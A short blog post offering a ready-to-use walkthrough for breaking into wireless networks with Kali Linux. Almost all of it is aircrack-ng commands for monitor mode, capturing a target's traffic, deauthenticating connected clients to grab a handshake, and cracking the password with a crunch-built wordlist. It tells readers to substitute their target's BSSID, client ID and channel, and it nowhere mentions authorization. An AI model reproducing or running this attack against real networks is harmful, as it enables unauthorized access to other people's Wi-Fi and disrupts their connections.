Hack any wifi with kali linux
- uttam rao
- Jun 7, 2017
- 2 min read

SO Simple and easy method follow these steps Hack like a pro
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<HACK WIFI >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> *first open a terminal and type the commands in first terminal airmon-ng check kill airmon-ng airmon-ng start wlan0 airodump-ng wlan0mon or wlan0 airodump-ng -w wifiname -c channel --bssid C4:0B:CB:55:F2:F3 wlan0mon You see The process is running now rightclick on this terminal and open terminal 2nd on clicking on first terminl.>>>>>>>>>>>>>and type below commands aireplay-ng --deauth 10 -a C4:0B:CB:55:F2:F3 -c E8:4E:84:94:B7:E7 wlan0mon aircrack-ng -w /root/Desktop/list.lst -b C4:0B:CB:55:F2:F3 handshakefile <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<NOTE REPLACE THESE THINGS ACORDING TO YOUR TARGET >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>. 1 wlan0 or wlan0mon= is the mode name some laptops wlan0mon is working or wlan0 2 wifiname= this is the name which you want to hack example>> D-link,bsnl-ap,uttam rao 3 channel = it is the channel number of your target wifi ex>> 11,2,5 4 C4:0B:CB:55:F2:F3 = It is the bssid replace this bssid from your target wifi bssid 5 E8:4E:84:94:B7:E7 = It is the STATION ID replace this station id from your target wifi STATION ID 6 /root/Desktop/list.lst =list.lst is a text file which contain a lot of target based passwords if you want to hack wifi firstly you must prepare your password list text file in kali linux by crunch command then you can easily drag and drop your password text file in terminal after drop which is look like as . example=aircrack-ng -w '/root/Desktop/passwordlist.lst' <<NOTE remove the coma (') then this is looking as =aircrack-ng -w /root/Desktop/passwordlist.lst 7 if your password list is in .txt extention so you replace this extention by .lst 8 handshakefile= it is the file which containing some importent info replace this by wifiname-01.cap file
Comments